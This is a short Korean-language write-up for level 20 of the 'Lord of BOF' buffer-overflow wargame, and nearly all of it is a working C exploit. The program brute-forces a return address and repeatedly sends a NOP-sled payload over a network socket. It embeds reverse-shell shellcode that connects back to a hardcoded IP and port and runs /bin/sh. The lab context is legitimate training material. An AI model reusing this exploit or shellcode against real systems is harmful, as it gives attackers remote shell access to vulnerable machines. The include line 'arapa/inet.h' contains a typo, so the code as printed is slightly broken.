[BOF 원정대] xavius -> death_knight (level 20)

argv[1]에 쉘코드를 올리고 argv[1]의 주소를 brute foce하여 ret 위치에 써주는 방식을 사용했다.

exploit code

/* Load of BOF Level 20 2014. 07. 28 written by ab2rz1 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arapa/inet.h> char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\xb0\x66\xb3\x01\x51\x6a\x06\x6a" "\x01\x6a\x02\x89\xe1\xcd\x80\x89" "\xc6\xb0\x66\x31\xdb\xb3\x02\x68" "\xc0\xa8\xde\x8d\x66\x68\x17\x7a\x66\x53\xfe" "\xc3\x89\xe1\x6a\x10\x51\x56\x89" "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe" "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31" "\xc0\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" "\x80"; //92byte ip : 192.168.222.141 port : 6010 int main (int argc, char *argv[]) { int fd; struct sockaddr_in serv_addr; unsigned char buf[256]; unsigned int Ret_Addr = 0xc0000000; while (1) { if ((fd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("socket() error\n"); exit(0); } memset(&serv_addr, 0, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = inet_addr(argv[1]); serv_addr.sin_port = htons(atoi(argv[2])); if (connect (fd, (struct sockaddr*)&serv_addr, sizeof(serv_addr)) == -1) { printf("connect() error\n"); exit(0); } memset(buf, '\x90', sizeof(buf)); memcpy(&buf[44], &Ret_Addr, 4); memcpy(&buf[92], shellcode, strlen(shellcode)); Ret_Addr -= 12; send(fd, buf, strlen(buf), 0); printf("%p\n", Ret_Addr); close(fd); } return 0; }

쉘코드 출처 : http://www.exploit-db.com/exploits/25497/

리버스 바인딩 쉘을 사용하였다.